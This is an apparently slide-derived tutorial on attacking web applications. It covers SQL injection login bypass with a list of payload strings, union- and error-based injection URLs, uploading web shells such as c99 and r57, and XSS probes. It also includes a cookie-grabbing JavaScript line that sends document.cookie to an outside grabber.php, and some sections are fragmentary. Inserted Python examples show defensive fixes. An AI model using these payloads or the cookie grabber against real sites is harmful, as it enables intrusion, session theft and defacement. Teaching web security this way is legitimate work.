Session Flow
Web Architecture
Security Misconceptions
Latest Threats on Web
SQL Basics
SQL Injection Authentication Bypass
SQL Injection Union Based
SQL Injection Error Based
Control Panel
Web Architecture
Web Architecture is nothing but a simple client-server model.
All the users of the internet are clients, and the web pages
which they are viewing are on the Web Server.
A Web Server contains one or more websites.
The client requests the web page from the server and, as the
response, the server sends the appropriate data.
It seems very simple, but in reality our request has to pass
through many servers, and only if the response is positive does
the client get the page.
Different types of server:
Application Server
Backup Server
Mail Server
DB Server
File Sharing & Printing Server
Web Server
Etc, etc, etc
Security Misconceptions
The Firewall protects my web server and database
Access to the server through ports 80 and 443 makes the web
server part of your external perimeter defense.
Vulnerabilities in the web server software or web applications
may allow access to internal network resources.
The IDS & IPS protect my web server and database
The IDS is configured to detect signatures of various well-known attacks.
Attack signatures do not include those for attacks against
custom applications.
It keeps a log of the events and all the actions performed by
users, which is practically not possible to monitor.
SSL secures the website
SSL secures the transport of data between the web server and
the user's browser.
SSL does not protect against attacks on the server and
applications.
SSL is the hacker's best friend due to the false sense of
security it creates.
Latest Threats
SQL Injection
Cross-Site Scripting (XSS)
Broken Authentication and Session Management
Insecure Direct Object References
Cross-Site Request Forgery (CSRF)
Security Misconfiguration
Insecure Cryptographic Storage
Failure to Restrict URL Access
Insufficient Transport Layer Protection
Unvalidated Redirects and Forwards
SQL Basics
SQL stands for Structured Query Language.
It is the language used for the communication between the database
and the application.
SQL Basics
The standard SQL statements for data manipulation are:
SELECT Statement
INSERT INTO Statement
UPDATE Statement
DELETE Statement
SQL Basics
SQL also allows one to perform operations on the tables themselves,
i.e. to define the data structure:
CREATE TABLE
ALTER TABLE
DROP TABLE
DELETE TABLE
SQL Basics
The SELECT statement is used to select data from a table.
The INSERT INTO statement is used to insert data into an already
created table.
The UPDATE statement is used to update the data of a column in
a table.
The DELETE statement is used to delete data from a table.
SQL Basics
Sample Database
The sample database name is: NewsDB
It contains one table: News
Its four columns are:
ID
NewsTitle
NewsContent
NewsAuthor
SQL Basics
Sample Queries
Query: select * from news;
The execution of this query will return all the data from the news table.
Query: select news_content, news_title from news where ID=3;
The execution of this query will return only the news content and
news title columns from the news table, for the row where the ID column's value is 3.
SQL Basics
Sample Scenario
There is a website, site.com
The website is nothing but a group of more than one web
page, and one page of the website is
www.site.com/adminlogin.php
We can assume the details behind the code are:
Database           : SiteDB
Table Names        : userlogin, adminlogin, news, etc
adminlogin Columns : adminid, pass
SQL Basics
To log in to the adminlogin.php page, whenever the admin
enters the adminid and password, a query is executed on the
adminlogin table. The query will look somewhat like:
select * from adminlogin where adminid='<value>' and
pass='<value>';
i.e.: select * from adminlogin where adminid='admin' and
pass='adminpass';
If the username and password are correct, the admin will be
able to log in with the username admin and password
adminpass.
SQL Injection
SQL Injection is a method of injecting SQL queries into the
website. By injecting malicious queries, a hacker can easily:
Bypass the authentication
Grab the structure of the database
Grab the sensitive data
Authentication Bypass
Sample Scenario
There is a website, site.com
The website is nothing but a group of more than one web
page, and one page of the website is
www.site.com/adminlogin.php
We can assume the details behind the code are:
Database           : SiteDB
Table Names        : userlogin, adminlogin, news, etc
adminlogin Columns : adminid, pass
To log in to the adminlogin.php page, whenever the admin
enters the adminid and password, a query is executed on the
adminlogin table. The query will look somewhat like:
select * from adminlogin where adminid='<value>' and pass='<value>';
Authentication Bypass
But what if someone passes ' or '0'='0 as the password???
The query would be:
select * from adminlogin where adminid='admin' and
pass='' or '0'='0';
Whatever we pass as the value is placed between two single
quotes, i.e.: '<value>'
The query will be divided into two parts:
select * from adminlogin where adminid='admin' and pass=''
or '0'='0';
Here, the condition 0=0 will always be true, and
authentication will be bypassed!
We can try to put the same ' or '0'='0 as the username and
password if needed.
It is to be understood that we can replace 0 with 1, X and so on,
i.e.: ' or '1'='1
' or 'X'='X
As per the surveys, still more than 65% of websites are
vulnerable to this injection.
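As an added example (not from the slides), the login query above built by string concatenation beside a parameterized version, both run against a constructed in-memory SQLite copy of the SiteDB adminlogin table; the bypass value from this slide only gets a row back from the concatenated form:

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the slides' SiteDB.adminlogin table
    (columns adminid, pass). Plaintext storage only mirrors the slide."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE adminlogin (adminid TEXT, pass TEXT)")
    conn.execute("INSERT INTO adminlogin VALUES ('admin', 'adminpass')")
    conn.commit()
    return conn


def built_query(adminid: str, password: str) -> str:
    """The query text the slides describe, assembled by string concatenation:
    the values are dropped between single quotes, so a quote in the input
    changes the SQL itself. Logging this string shows the injected 'or'."""
    return (f"select * from adminlogin where adminid='{adminid}' "
            f"and pass='{password}'")


def login_vulnerable(conn: sqlite3.Connection, adminid: str, password: str) -> bool:
    """Runs the concatenated query: any row back means 'logged in'."""
    return conn.execute(built_query(adminid, password)).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, adminid: str, password: str) -> bool:
    """Same query with bound parameters: the driver passes the values apart
    from the SQL text, so ' or '0'='0 is compared as a literal password."""
    query = "select * from adminlogin where adminid=? and pass=?"
    return conn.execute(query, (adminid, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    probe = "' or '0'='0"  # the bypass value discussed in the slide above
    print(built_query("nobody", probe))
    print("concatenated :", login_vulnerable(db, "nobody", probe))     # True
    print("parameterized:", login_parameterized(db, "nobody", probe))  # False
```

Note that the concatenated form logs in even with a username that does not exist, because the injected `or` clause applies to the whole WHERE condition.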
Authentication Bypass
Sample Keywords
or 1'=1
or x='x
or 0=0
or 0=0
or 0=0
or 0=0 #
or 0=0 #
or 0=0 #
or x='x
or x=x
) or (x='x
or 1=1
or 1=1
or 1=1
or a=a
or a=a
) or (a='a
) or (a=a
hi or a=a
hi or 1=1
hi or 1=1
or1=1'
SQL Injection Union Based
Table: Bollywood
E_ID  E_Name
1     Vidit Baxi
2     Shahrukh Khan
3     John Abraham
Table: Hollywood (it contains all the Hollywood actors)
E_ID  E_Name
1     Vidit Baxi
2     Jim Carrey
3     Daniel Craig
Now we want to list all the different actors from Bollywood and
Hollywood; we use the following SELECT statement:
E.g.: SELECT E_Name FROM Bollywood
UNION
SELECT E_Name FROM Hollywood
The result-set will look like this:
E_Name
Vidit Baxi
Shahrukh Khan
John Abraham
Jim Carrey
Daniel Craig
The ORDER BY Keyword: The ORDER BY keyword is used to sort the result-set.
Without ORDER BY:
E_Name
John Abraham
Vidit Baxi
Shahrukh Khan
Shahid Kapoor
With ORDER BY:
E_Name
Vidit Baxi
John Abraham
Shahid Kapoor
Shahrukh Khan
Union Based
Blank Page
i.e.:
http://www.site.com/product.php?id=-4 union select 1,2,3,4 --
http://www.site1.com/list.php?catid=-3 union select 1,2,3,4 --
http://www.site2.com/product.php?product=-car union select 1,2,3,4 --
Database
Sometimes you may get all the table names, but sometimes
you will get only the 1st table; so to get all the table names
together
Column Name
[Diagram: the table list of information_schema, Table 1 to Table 6, with "Top 1" pointing at the first entry; as each fetched name is excluded, "Top 1" points at the next one]
This query will select the 1st table from
information_schema.tables,
i.e.: the selected table name is
users.
[Diagram: the columns of the fetched table, column 1, column 2, ..., admin, with "Top 1" pointing at the first column]
To fetch the second column, edit the query:
http://www.site.com/product.aspx?id=4 and 1=convert(int,(select top
1 column_name from information_schema.columns where
table_name='Table-1' and column_name not in('col1'))) --
After fetching the proper table name and column names, we can
fetch the data from the tables.
[Diagram: the data of Column 1 and Column 2 (Data 1 to Data 8, admin), with "Top 1" pointing at the first row]
Control Panel
Control panels can be classified into 3 types.
Domain Control Panel: Whenever one buys a domain, the
Domain Provider assigns you a control panel where you can
add, edit and delete the domain-related resources like DNS,
Sub Domains, etc.
Hosting Control Panel: Whenever one buys hosting space
to host the website, the Hosting Provider assigns you a control
panel where you can add, edit and delete the pages of the
website.
Admin Control Panel: Whenever one creates a website, for
the content management the developer puts up a page where one
can add, edit and delete the data.
Control Panel
After getting access to the website, a hacker will try to get
access to the admin control panel, where a hacker can add,
edit, delete and modify the data.
A White Hat Hacker may not do anything, but a Black Hat
Hacker may also delete the data and can even upload another
control panel. A hacker's control panel can harm not only one
website but all the websites on the server. If the hacker is able to get root
access on the server, all the websites can be defaced or the
database can be tampered with.
Control Panel
Screenshots: Domain Control Panel, Hosting Control Panel, Admin Panel
Understanding the control panel is the most important part of
web security.
A control panel comes with a good number of options. One
needs to choose the appropriate option for the website.
Screenshots: control panel options, Online File Manager
As a part of the Gaining Access Phase, hacker hacks into the
website, then gets the access to the control panel. But to
mention the access on the website, hacker uploads another
control panel, Hacker Control Panel.
Hacker Control Panels are same as the general control panels.
Hacker control panels are known as shell.
From the hacker control panel, Hacker can get access to the
database, upload content, execute commands on the server,
delete existing files, edit source code of the pages, and Deface
the website.
Hacker can also get the root access on the server. This may
allow hacker to hack into the other websites of the same
server.
Control Panel
Shells for the Windows platform and the Linux platform are different.
For the Windows platform hackers can use:
k shell
Asp shell
Devilz shell
Etc, etc, etc
Screenshots: b374k Shell, c99 Shell, devilz Shell, k Shell, r57 Shell, Upload Option, Uploaded Content
XSS
XSS, the Cross Site Scripting.
It's a vulnerability which is found very frequently in
websites and which enables the attacker to inject client-side
scripts into the website.
The attacker sends the vulnerable website, with his malicious
script, to another user; when the browser receives all the scripts,
it assumes they have all come from the trusted source,
and because of that the victim gets compromised.
Generally this vulnerability is found in the search box, shout
box, comment box, etc. It can also be found the same way
we find SQL Injections.
Just to verify whether the website is vulnerable to the XSS
vulnerability or not, a hacker can try the following script in the
search box or the comment box:
<script>alert('Vidit')</script>
or
<script>alert("Vidit")</script>
or
<script>alert(0)</script>
If the website loads with the alert box, then the website is
vulnerable to XSS.
XSS
There is no single, standardized classification of cross-site
scripting flaws, but primarily we can divide XSS into 2
types:
1. Persistent XSS Vulnerability
2. Reflected XSS Vulnerability
2. Reflected XSS Vulnerability
When a hacker injects the malicious script into the
website, unlike the persistent one, the code is not
injected into the source of the website. It stays limited
to the browser. In this case, the hacker will send the website
link along with the malicious script to the other user, so
along with the website data, the script will also be
executed.
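As an added example (not from the slides), a search box that reflects its term into the page with and without HTML output encoding, using the alert probe from the verification slide as the constructed input; the render functions and their names are assumptions, not any real site's code:

```python
import html

# Constructed sample: the probe string the slides use to test a search box.
PROBE = "<script>alert('Vidit')</script>"


def render_search_unsafe(term: str) -> str:
    """Reflects the term verbatim into the HTML body: the vulnerable pattern.
    The browser treats the reflected <script> as part of the page."""
    return f"<p>Results for: {term}</p>"


def render_search_safe(term: str) -> str:
    """Output-encodes the term for an HTML text context. quote=True also
    encodes ' and ", so the same call is safe inside a quoted attribute."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


def render_attr_safe(term: str) -> str:
    """Same encoding used to echo the term back into the search field's
    value attribute, the other place a search page usually reflects it."""
    return f'<input name="q" value="{html.escape(term, quote=True)}">'


def reflects_markup(page: str, term: str) -> bool:
    """Detection helper: True when the probe appears unencoded in the
    response, i.e. the alert would fire in a browser."""
    return term in page


if __name__ == "__main__":
    print(render_search_unsafe(PROBE))  # reflects <script> as-is
    print(render_search_safe(PROBE))    # <p>Results for: &lt;script&gt;...
    print(render_attr_safe(PROBE))
```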
XSS
Sample Attacks
1. Cross Frame Scripting
2. Cross Site Request Forgery (CSRF/XSRF)
3. DOM Based Attack
4. Session Hijacking
XSS
1. Cross Frame Scripting
Cross Frame Scripting is one of the dangerous outcomes of the
Cross Site Scripting vulnerability.
A hacker can use the frame tag of HTML to load another
website in a frame of the vulnerable website.
The hacker may also load the pages of the same website,
i.e. the login page of the bank website.
The victim checks the URL, which is always found to be the
trusted one, and gets hacked.
Generally hackers prefer to load a phishing page in the
frame.
As an example:
<IFRAME SRC="http://www.site.com" />
We can assume site.com to be the phishing page or the page of the
other website.
2. Cross Site Request Forgery (CSRF/XSRF)
A Cross Site Request Forgery vulnerability in any website allows
the hacker to send a page link which contains some malicious
code and can also compromise the victim's data.
A hacker can use the image tag of HTML to simply load any
image from any website.
The hacker may also try to use a website link instead of
an image path; it may also hijack the user's session.
The victim checks the URL, which is always found to be the
trusted one, and gets hacked.
Generally hackers prefer to load a session hijacking exploit
in the frame.
As an example:
<IMG SRC="http://www.site.com/images/image1.jpg" />
This tag may load the image from site.com on the website
page.
With a website link in place of the image path, the tag may not load
any image, but it may force the user to do the transaction if the
user is already authenticated on the website.
Screenshot: and as the result, it is loading the image of the actual hero
of India.
In the same way, a hacker can also load a session hijacking or any
other malicious query along with the IMG SRC tag.
XSS
3. DOM Based Attack:
4. Session Hijacking:
Session Hijacking is one of the most dangerous vulnerabilities that exist
in web applications.
The hacker can grab the client-side cookie of the user and can
use that to be authenticated by the server-side cookie.
Javascript:document.location='http://www.site.com/grabber.php?cookie='.concat(escape(document.cookie));
As per our code, the cookie will be stored in the cookies.txt
file. The session contains two variables, referrer and cookie;
the attacker needs to edit both variables in the browser
while opening the website.
Thus the installed session of the victim will act as a client-side
cookie and the server-side cookie will give a positive response.
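As an added example (not from the slides), a check over Set-Cookie headers for the attributes that blunt the two attacks above: HttpOnly keeps document.cookie from reading the session cookie the grabber collects, and SameSite stops the browser from attaching it to a forged IMG SRC request. The header values are constructed; PHPSESSID is only the usual PHP session cookie name and the function names are assumptions.

```python
# Constructed sample headers. The weak one is a session cookie with no
# protective attributes; the hardened one is what a reviewer wants to see.
WEAK = "PHPSESSID=2f3c9a; Path=/"
HARDENED = "PHPSESSID=2f3c9a; Path=/; Secure; HttpOnly; SameSite=Lax"


def parse_set_cookie(header: str):
    """Split one Set-Cookie value into (name, value, attributes). Attribute
    names are lower-cased; flags without a value are stored as True."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() or True
    return name.strip(), value, attrs


def missing_protections(header: str) -> list:
    """Return which mitigations the cookie lacks:
    HttpOnly - script (document.cookie) can read it, so the grabber works;
    Secure   - it is sent over plain HTTP and can be sniffed;
    SameSite - it rides along on cross-site requests such as a forged <img>."""
    _, _, attrs = parse_set_cookie(header)
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")
    if "secure" not in attrs:
        missing.append("Secure")
    samesite = attrs.get("samesite")
    if not isinstance(samesite, str) or samesite.lower() not in ("lax", "strict"):
        missing.append("SameSite")  # absent or SameSite=None gives no CSRF help
    return missing


def audit_response_headers(set_cookie_values: list) -> dict:
    """Run the check over every Set-Cookie header of one response,
    keyed by cookie name, so the session cookie stands out in a report."""
    return {parse_set_cookie(h)[0]: missing_protections(h)
            for h in set_cookie_values if h.strip()}


if __name__ == "__main__":
    print(audit_response_headers([WEAK]))      # {'PHPSESSID': ['HttpOnly', 'Secure', 'SameSite']}
    print(audit_response_headers([HARDENED]))  # {'PHPSESSID': []}
```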